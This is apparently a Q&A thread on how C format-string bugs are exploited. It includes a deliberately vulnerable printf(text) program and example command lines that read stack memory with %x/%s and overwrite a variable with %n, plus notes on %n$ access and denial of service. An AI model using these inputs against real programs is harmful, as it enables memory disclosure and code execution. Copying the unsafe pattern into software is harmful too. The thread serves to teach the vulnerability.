How can the Format-String vulnerability be exploited?

I read about code vulnerabilities and came across this Format-String vulnerability.

Wikipedia says:

Format string bugs most commonly appear when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended.

I understand the problem with the printf(buffer) version, but I still do not see how an attacker could use this vulnerability to execute malicious code. Can someone please show me, with an example, how this vulnerability can be exploited?

+59
c security
Sep 18 '11 at 5:17
7 answers

You can exploit format string vulnerabilities in many ways, directly or indirectly. Let's use the following program as an example (assuming no relevant OS protections are in place, which is very rare):

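    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
        char text[1024];
        static int some_value = -72;

        if (argc < 2)
            return 1; /* nothing to print */

        strcpy(text, argv[1]); /* ignore the buffer overflow here */

        printf("This is how you print correctly:\n");
        printf("%s", text);
        printf("This is how not to print:\n");
        printf(text); /* BUG: user input is used as the format string */

        /* printing a pointer with %08x assumes a 32-bit target */
        printf("some_value @ 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
        return(0);
    }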

The basis of this vulnerability is the behavior of functions with variable arguments. A function that handles a variable number of parameters has to read them from the stack, essentially. If we specify a format string that makes printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else that happens to be on the stack. By extension, if we control the format string, we get the two most fundamental primitives:




Read from arbitrary memory addresses

[EDIT] IMPORTANT: I am making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise of the vulnerability; in any case, they vary across OS, platform, program, and configuration.

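You can use the %s format specifier to read data from an address. The original format string passed to printf(text) is itself stored on the stack, so you can walk the stack until you reach it and read anything along the way. In the run below, the fourth %08x prints 41414141, which is the AAAA at the start of the format string: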

    ./vulnerable AAAA%08x.%08x.%08x.%08x
    This is how you print correctly:
    AAAA%08x.%08x.%08x.%08x
    This is how not to print:
    AAAAXXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
    some_value @ 0x08049794 = -72 [0xffffffb8]



Writing to arbitrary memory addresses

You can use the %n format specifier to write to an arbitrary address (almost). Again, take the vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:

    ./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
    This is how you print correctly:
    ??%08x.%08x.%08x.%n
    This is how not to print:
    ??XXXXXXXX.XXXXXXXX.XXXXXXXX.
    some_value @ 0x08049794 = 31 [0x0000001f]

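We have overwritten some_value with the number of bytes written before the %n specifier was encountered (see man printf). Here that is 4 address bytes plus three 8-digit values, each followed by a dot: 4 + 3 * 9 = 31. We can use the format string itself, or a field width, to control this value: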

    ./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
    This is how you print correctly:
    ??%x%x%x%n
    This is how not to print:
    ??XXXXXXXXXXXXXXXXXXXXXXXX
    some_value @ 0x08049794 = 21 [0x00000015]

There are many possibilities and tricks to try (direct parameter access, large field widths that make wrap-around possible, building your own primitives), and this only touches the tip of the iceberg. I would suggest reading more articles on format string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book that touches on the subject.




Disclaimer: the examples are taken (though not verbatim) from the book Hacking: The Art of Exploitation (2nd ed.) by Jon Erickson.

+88
Sep 18 '11

Interestingly, no one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:

 "%200$p" 

to read the 200th item on the stack (if there is one). The intention is that you list all the n$ numbers from 1 to the maximum; the notation provides a way of reordering how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).

However, some (probably most) systems are somewhat lax about how they validate the n$ values, and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.




* The abbreviations I18N, L10N, G11N and M18N stand for internationalization, localization, globalization and multinationalization, respectively. The number is the count of omitted letters.

+11
Sep 19 '11 at 5:12

Ah, the answer is in the article!

Uncontrolled format string is a type of software vulnerability, discovered around 1999, that can be used in security exploits. Previously thought harmless, format string exploits can be used to crash a program or to execute harmful code.

A typical exploit uses a combination of these techniques to force a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shellcode. The padding parameters to format specifiers are used to control the number of bytes output, and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the %n format token can then overwrite with the address of the malicious code to execute.

This is because %n causes printf to write data to a variable whose address is taken from the stack. That means it could write to something arbitrary. All you need is for something to use that variable (relatively easy if it happens to be a function pointer whose value you have just figured out how to control), and the attacker can make the program execute anything.

Take a look at the links in the article; they look interesting.

+9
Sep 18 '11

I would recommend reading this lecture note about format string vulnerabilities. It details what is happening and how, and has some images that can help you understand this topic.

+2
Mar 31 '13 at 9:14

AFAIK it is mainly because it can crash your program, which counts as a denial-of-service (DoS) attack. All you need to do is make printf dereference an invalid address (practically anything with a few %s in it is guaranteed to work), and you have a simple DoS attack.

Now, it is theoretically possible for that to trigger something in an exception/signal/interrupt handler, but figuring out how to do that is beyond me; you would need to figure out how to write arbitrary data to memory as well.

But why does anyone care if the program crashes, you ask? Isn’t it just inconvenient for the user (who deserves it anyway)?

The problem is that some programs are accessed by multiple users, so crashing them has a non-negligible cost. Or sometimes they are critical to the running of the system (or they may be in the middle of doing something very critical), in which case a crash can damage your data. Of course, if you crash Notepad then no one will care, but if you crash CSRSS (which, I believe, actually had a similar kind of bug, specifically a double-free bug), then yes, the whole system goes down with you.




Update:

See this link for the CSRSS error that I was referring to.




Edit:

Please note that reading arbitrary data can be just as dangerous as executing arbitrary code! If you read a password, a cookie, etc., it is just as serious as arbitrary code execution, and it is trivial if you have enough time to try enough format strings.

0
Sep 18 '11

A simple do-it-yourself example (I know it works on WinXP through Win7; I don't know about Win8): open a command prompt in Windows and run:

    C:\>sort idontexists
    idontexistsThe system cannot find the file specified.
    C:\>sort idontexists%s
    idontexists"The system cannot find the file specified.
    C:\>sort idontexists%s
    idontexists,The system cannot find the file specified.
    C:\>sort idontexists%s
    idontexistsóThe system cannot find the file specified.
    C:\>sort idontexists%s
    idontexists!The system cannot find the file specified.
    C:\>sort idontexists%s
    idontexistsºThe system cannot find the file specified.

When the file is not found, the program echoes the first argument back, and %s is replaced with whatever value happens to be on the stack, which is why the character after "idontexists" changes from run to run.

-2
May 6 '13 at 17:55

The explanation: remember that any varargs function in C needs some way to know how many parameters it has received. printf does this by parsing its first parameter. If you change the first parameter so that printf thinks it has additional arguments, it will read more things off the stack. (The Wikipedia link should cover this in more detail.)

-4
Sep 18 '11 at 5:28 a.m.